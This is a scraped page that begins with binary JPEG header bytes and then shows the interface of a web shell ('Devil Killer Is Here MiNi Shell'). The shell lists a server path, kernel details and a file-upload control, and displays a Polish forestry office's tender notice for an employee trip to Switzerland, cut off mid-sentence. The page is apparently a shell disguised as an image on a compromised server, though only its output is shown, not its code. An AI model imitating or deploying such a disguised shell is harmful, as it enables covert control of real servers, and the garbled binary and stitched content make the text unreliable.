JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240314/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240314/0024391501-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Organizacja wycieczki turystyczno-krajoznawczej do Szwajcarii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Zawadzkie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 530559010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Strzelecka 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zawadzkie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">47-120</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48774049655</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zawadzkie@katowice.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zawadzkie.katowice.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Organizacja wycieczki turystyczno-krajoznawczej do Szwajcarii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-73bf9589-e1cb-11ee-a01e-f641a8763d5f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00243915</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-03-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://www.gov.pl/web/nadlesnictwo-zawadzkie <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1) e-mail: zawadzkie@katowice.lasy.gov.pl<br/>2) Strona internetowa prowadzonego postępowania:<br/>https://www.gov.pl/web/nadlesnictwo-zawadzkie<br/>adres strony internetowej, na której udostępniane będą zmiany i wyjaśnienia treści niniejszej specyfikacji warunków zamówienia<br/>(„SWZ”) oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie zamówienia:<br/>https://www.gov.pl/web/nadlesnictwo-zawadzkie<br/>dedykowana platforma do obsługi komunikacji w formie elektronicznej pomiędzy Zamawiającym a wykonawcami oraz składania<br/>ofert: https://josephine.proebiz.com<br/>3) Godziny pracy: od poniedziałku do piątku, 7:00-15:00.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między zamawiającym<br/>a wykonawcami, w szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej.<br/>Środkiem komunikacji elektronicznej będzie oprogramowanie zaimplementowane w ramach platformy JOSEPHINE dostępnej pod<br/>adresem internetowym https://josephine.proebiz.com/pl/, oraz (zamiennie) poczty elektronicznej, z zastrzeżeniem, że złożenie oferty<br/>następuje wyłącznie przy użyciu platformy JOSEPHINE<br/>3. Ofertę sporządza się, pod rygorem nieważności, w postaci elektronicznej i opatruje się kwalifikowanym podpisem<br/>elektronicznym/podpisem zaufanym lub podpisem osobistym osoby upoważnionej)<br/>4. Zamawiający dopuszcza formaty danych określone w rozporządzeniu w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. (Dz.U. z 2020 r. poz. 2452) w szczególności formaty: .pdf, .doc, .docx, .rtf, .odt...<br/>5. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie JOSEPHINE.<br/>6. Za datę przekazania, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów<br/>lub oświadczeń oraz innych informacji przyjmuje się datę ich złożenia na platformie JOSEPHINE lub ich otrzymania przez<br/>Zamawiającego na wskazany w SWZ adres e-mail,<br/>7. a)Zamawiający będzie komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>zawadzkie@katowice.lasy.gov.pl.<br/>b)Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowania dokumentów w postaci papierowej składane przez<br/>Wykonawcę za pośrednictwem poczty elektronicznej, należy wysyłać na wskazany w lit b) adres email.<br/>Osobami uprawnionymi do wysyłania zatwierdzonej przez osobę uprawnioną korespondencji są:<br/>Tomasz Konfederak – tomasz.konfederak@katowice.lasy.gov.pl<br/>Andrzej Gąkowski – andrzej.gakowski@katowice.lasy.gov.pl<br/>Wykonawca zobowiązany jest kierować wszelką korespondencję na adres: zawadzkie@katowice.lasy.gov.pl<br/>c) we wszelkiej korespondencji Zamawiający i Wykonawcy posługują się numerem postępowania wskazanym w SWZ (znak sprawy).<br/>8. Złożenie oferty:<br/>a) Wykonawca składa ofertę za pośrednictwem platformy JOSEPHINE.<br/>b) Oferta powinna być sporządzona w języku polskim, z zachowaniem postaci elektronicznej w formacie danych określonych w<br/>rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań w<br/>rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie<br/>zamówienia publicznego lub konkursie (Dz.U. z 2020 r. poz. 2452) i podpisana podpisem elektronicznym/podpisem zaufanym lub<br/>podpisem osobistym osoby upoważnionej<br/>c) Zamawiający rekomenduje złożenie oferty w formacie .pdf i podpisanie jej podpisem elektronicznym/podpisem zaufanym lub<br/>podpisem osobistym osoby upoważnionej. Ofertę należy złożyć w oryginale.<br/>d) Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji, które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny zostać złożone w osobnym pliku<br/>wraz z jednoczesnym zaznaczeniem polecenia „Załącznik stanowiący tajemnicę przedsiębiorstwa”.<br/>e) Wykonawca może przed upływem terminu do składania ofert zmienić lub wycofać ofertę.<br/>f) Wykonawca po upływie terminu do składania ofert nie może skutecznie dokonać zmiany ani wycofać złożonej oferty</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">5.	Ochrona danych osobowych.<br/>1.	Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Zawadzkie. <br/>2.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 93 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>3.	Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o art. 8 oraz 96 ust. 3 PZP.<br/>4.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>5.	Niezależnie od postanowień pkt 18.4. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. <br/>6.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe, <br/>7.	Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>8.	Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1)	dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, <br/>2)	do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO,<br/>3)	do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. <br/>4)	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy RODO.<br/>9.	Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>10.	Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1)	prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO, <br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>11.	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">5.	Ochrona danych osobowych.<br/>1.	Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r., str. 1 – dalej „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Zawadzkie. <br/>2.	Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 93 ust. 1 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>3.	Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o art. 8 oraz 96 ust. 3 PZP.<br/>4.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 97 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zamówienia publicznego.<br/>5.	Niezależnie od postanowień pkt 18.4. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego. <br/>6.	Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe, <br/>7.	Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.<br/>8.	Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1)	dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, <br/>2)	do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO,<br/>3)	do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO. <br/>4)	wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy RODO.<br/>9.	Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>10.	Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1)	prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO, <br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>11.	Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S,270.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 171600,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego postępowania jest organizacja autokarowej wycieczki turystyczno-krajoznawczej pracowników Nadleśnictwa Zawadzkie emerytowanych pracowników i członków ich rodzin do Szwajcarii. Przewidywana liczba uczestników: 42 osób. Szczegółowy zakres zamówienia został opisany w załączniku nr 7 do SWZ.<br/><br/>Uwaga!<br/>Zamawiający zastrzega sobie prawo zmiany ilości uczestników +- 2 osoby. Rozliczenie nastąpi za udział faktycznej liczby uczestników.<br/>-------------------------------------------------------<br/>1.	Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie wycieczki turystyczno-krajoznawczej do Szwajcarii dla pracowników Nadleśnictwa Zawadzkie, emerytowanych pracowników oraz członków ich rodzin.<br/>2.	Liczba uczestników – 42 osoby (+- 2 osoby). Płatność za wycieczkę zostanie rozliczona wg rzeczywistej ilości uczestników. Nazwiska uczestników wycieczki mogą ulec zmianie. Zamawiający zastrzega możliwość bezkosztowej zmiany nazwisk uczestników do 30 dni przed wyjazdem. Zamawiający poinformuje Wykonawcę o ostatecznej ilości osób nie później niż 30 dni kalendarzowych przed planowanym rozpoczęciem wycieczki.<br/>3.	Termin: 14/15-19.06.2024 r. - wyjazd w godzinach nocnych 14/15.06.2024r, powrót w godzinach wieczornych 19.06.2024r.<br/>4.	Wycieczka realizowana w ramach wspólnej działalności socjalnej w zakresie organizacji wycieczek, finansowana ze środków własnych uczestników oraz z Zakładowego Funduszu Świadczeń Socjalnych zgodnie z obowiązującym Regulaminem ZFŚS.<br/>5.	Transport autokarem klasy LUX, klimatyzowanym, posiadającym regulowane oparcia <br/>i podnóżki, podłokietniki dla wszystkich pasażerów, możliwość rozsunięcia foteli, indywidualne oświetlenie i regulację klimatyzacji. Transport z siedziby Nadleśnictwa Zawadzkie, ul. Strzelecka 6, 47-120 Zawadzkie na trasie Polska-Szwajcaria- Polska (rozpoczęcie i zakończenie wycieczki w siedzibie Nadleśnictwa Zawadzkie). Autokar z czynnym WC oraz mini-barkiem z możliwością serwowania kawy i herbaty (czarna, owocowe) - w trakcie wycieczki kawa i herbata dostępne bez limitu, wliczone w cenę wycieczki. W autokarze WI-FI umożliwiające dostęp do internetu.<br/>6.	Opieka polskojęzycznego, licencjonowanego przewodnika ze znajomością terenu w trakcie realizacji programu wycieczki.<br/>7.	Ubezpieczenie: KL minimum 20 000 euro , ratownictwo minimum 50 000 euro, NNW min. 20 000 zł, KL i ratownictwo obejmujące zdarzenia pod wpływem alkoholu. – <br/>8.	Hotele lub pensjonaty w których będą nocować uczestnicy wycieczki o standardzie minimum *** (trzy gwiazdki). Pokoje z łazienkami, 2 lub 3 osobowe, szczegółowy podział do ustalenia po przekazaniu listy uczestników.<br/>9.	Wyżywienie: minimum 5 śniadań (bufet szwedzki) i 5 obiadokolacji (bufet szwedzki lub dwa dania, np.zupa + drugie danie). <br/>Obligatoryjne punkty programu wycieczki:<br/>•	Bawaria, zamki Neuchswenstein i Hohenschwangau, <br/>•	Berno, <br/>•	Lucerna,<br/>•	Grindelwald i przejażdżka kolejka zębatą na Jungfraujoch<br/>•	Odpoczynek w jednym z alpejskich wysokogórskich kurortów z czasem wolnym na indywidualne wyjście na szlak (indywidualne atrakcje dla pozostałych uczestników na miejscu) – opcjonalnie, jeżeli będzie to możliwe do zrealizowania,<br/>•	Degustacja lokalnych specjałów, np. czekolada, wina, sery<br/>•	Przejazd panoramicznym pociągiem Bernina Express z Szwajcarii do Włoch (w dwie strony)<br/>•	Rejs statkiem po jednym z alpejskich jezior lub inna zamienna atrakcja.<br/><br/>Dokładny, wiążący, program wycieczki zostanie uzgodniony z Zamawiającym i przedstawiony przez Wykonawcę najpóźniej 30 dni przed wyjazdem.<br/><br/>Informacje dodatkowe:<br/><br/>Oferowana cena musi zawierać wszelkie koszty związane z organizacją wycieczki zgodnie z opisem przedmiotu zamówienia, w tym także m.in.: <br/>1.	Opłaty paliwowe, miejskie, parkingowe, autostradowe itp. podczas całej wycieczki<br/>2.	Obowiązkowe składki na Turystyczny Fundusz Gwarancyjny, Pomocowy Fundusz Turystyczny i inne wymagane prawem <br/>3.	Bilety wstępu do wszystkich atrakcji ujętych w programie (muzea, bilety na statek, pociąg, kolej linowa itp.) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">63511000-4 - Organizacja wycieczek</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-06-14 do 2024-06-19</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Oceny ofert będzie dokonywała komisja. W toku badania i oceny ofert Zamawiający może żądać od<br/>Wykonawców wyjaśnień dotyczących treści złożonych ofert. Zamawiający poprawi w ofercie omyłki zgodnie z przepisami ustawy<br/>Pzp.<br/>2) Zamawiający wyznaczył następujące kryteria oceny i wyboru oferty:<br/>Oznaczenie -Kryterium- Waga[%]<br/>C - Cena oferty -60%<br/>D - Doświadczenia Wykonawcy- 40%<br/>P - SUMA -100<br/>3) Ofertom zostaną przyznane punkty wg wzoru: P=C + D<br/>4) Sposób oceny oferty w kryterium „Cena oferty”:<br/>C = (najniższa cena spośród badanych ofert): (cena oferty badanej) * 60 pkt<br/>Wynik powyższego działania zostanie zaokrąglony do 2 miejsc po przecinku.<br/>5) W kryterium „Doświadczenie” Zamawiający przyzna maksymalnie 40 punktów odpowiadające 40% ogólnej ocenie oferty.<br/>Sposób obliczania punktów dla w/w 